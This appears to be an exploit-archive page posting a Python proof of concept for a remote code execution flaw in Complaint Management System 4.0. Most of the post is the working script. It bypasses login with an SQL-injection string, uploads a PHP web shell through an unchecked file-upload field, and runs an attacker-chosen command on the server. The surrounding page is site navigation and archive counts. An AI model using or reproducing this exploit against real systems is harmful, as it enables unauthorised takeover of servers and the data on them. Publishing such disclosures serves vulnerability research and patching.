Complaint Management System 4.0 Remote Code Execution

Complaint Management System 4.0 Remote Code Execution: Posted Jan 7, 2020; Authored by Metin Yunus Kandemir; Complaint Management System version 4.0 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 7b0aa980a77d3f44b50de965bfd78bcc8506a9e151f332e040c46eef55d76f21; Download | Favorite | View

Complaint Management System 4.0 Remote Code Execution

# Exploit Title: Complaint Management System 4.0 - Remote Code Execution
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.0
# Category: Webapps
# Tested on: Xampp for Windows
# Description:
# There isn't any file extension control at the "Register Complaint" section of user panel.
# An unauthorized user can upload and execute php file.
# Below basic python script will bypass authentication and execute command on target server.

poc.py

#!/usr/bin/python

import requests
import sys
                  

if len(sys.argv) !=3:
  print "[*] Usage: PoC.py rhost/rpath command"
  print "[*] e.g.: PoC.py 127.0.0.1/cms ipconfig"
  exit(0) 

rhost = sys.argv[1]
command = sys.argv[2]

#authentication bypass
url = "http://"+rhost+"/users/index.php"
data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}

with requests.Session() as session:
  
  login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})

  
  #check authentication bypass
  check = session.get("http://"+rhost+"/users/dashboard.php", allow_redirects=False)
  print ("[*] Status code for login: %s"%check.status_code)
  if check.status_code == 200:
    print ("[+] Authentication bypass was successfull")
  else:
    print ("[-] Authentication bypass was unsuccessful")
    sys.exit()
  
  #upload php file
  ufile = {'compfile':('command.php', '<?php system($_GET["cmd"]); ?>')}
  fdata = {"category": "1", "subcategory": "Online Shopping", "complaintype": " Complaint", "state": "Punjab", "noc": "the end", "complaindetails": "the end","compfile": "commmand.php", "submit": ""}
  furl = "http://"+rhost+"/users/register-complaint.php"
  fupload = session.post(url=furl, files= ufile, data=fdata)

  #execution
  final=session.get("http://"+rhost+"/users/complaintdocs/command.php?cmd="+command)

  if final.status_code == 200:
    print "[+] Command execution completed successfully.\n"
    print "\tPut on a happy face.\n"
  else:
    print "[-] Command execution was unsuccessful."
    print "\tOne bad day!"
    sys.exit()

  print final.text

Top Authors In Last 30 Days

Red Hat 226 files
Ubuntu 86 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,374)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,287)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,660)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

Complaint Management System 4.0 Remote Code Execution

Complaint Management System 4.0 Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Complaint Management System 4.0 Remote Code Execution

Share This

Complaint Management System 4.0 Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems